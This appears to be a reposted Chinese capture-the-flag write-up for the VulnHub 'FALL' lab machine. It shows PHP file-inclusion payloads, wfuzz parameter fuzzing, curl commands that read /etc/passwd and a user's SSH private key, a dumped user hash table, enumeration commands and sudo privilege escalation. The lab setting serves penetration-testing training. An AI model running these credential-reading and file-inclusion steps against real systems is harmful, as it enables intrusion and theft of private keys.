遇见是福气,错过也是
靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/
连接好kali,主机发现 & 端口扫描,发现了两个http服务,一个是80端口一个9090端口
这是80界面
这是9090界面
随便点点,文件包含伪协议如下(利用失败)
php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php
php://filter/string.strip_tags|convert.base64-decode/resource=shell.php
data://text/plain,<?php%20phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
file:///etc/passwd
http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>
看到网站底部,2.2.15版本
漏洞检索,但是需要鉴权我们并没有登录后台
这里看到一个用户发送的一个消息,留着有一个后门
接下来进行目录扫描,发现有一个test.php
dirsearch -u http://10.10.10.199
利用wfuzz工具,对参数进行爆破,并筛选出响应长度在100到100000之间的结果
wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt
--ss "^(.{100,100000})$"
此时发现有一个file
参数,访问payload,并发现写那篇文章的qiu
用户,
curl http://10.10.10.200/test.php?file=/etc/passwd
查看是否存在id_rsa
,这个文件呢是私匙,在linux中它非常的敏感,如果用户泄露了此文件,那么攻击者就可以利用此文件免密登录服务器,通过下面的命令,可以看到目标服务器泄露了此用户的文件
curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa
确保私钥文件的权限被严格限制。通常,私钥文件的权限应设置为 600
(只有所有者可以读写),否则可能利用不成功。
curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu
chmod 600 qiu
ssh [email protected] -i qiu
登录成功后,进行内网信息收集,外网还有一个9090端口的web,那么就来看数据库配置,密码为P@ssw0rdINSANITY
查看表数据
mysql> select * from cms_users
-> ;
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | [email protected] | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 |
| 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | [email protected] | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
2 rows in set (0.00 sec)
解密失败
基本信息收集
uname -a
hostname # 主机名
# 系统信息相关
lsb_release -a
cat /etc/os-release
cat /proc/version
# 权限相关
sudo -l # 查看可以使用sudo的文件
find / -perm -4000 -print 2>/dev/null # 查找 SUID文件
ls -al /etc/cron* # 查看所有计划任务
find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息
# 其他信息收集
ps -aux
netstat -tulnp
history
直到历史命令
测试sudo,提权成功(之前的mysql服务器密码也可以尝试)
原文始发于微信公众号(泷羽Sec):【oscp】FALL,wfuzz参数模糊测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论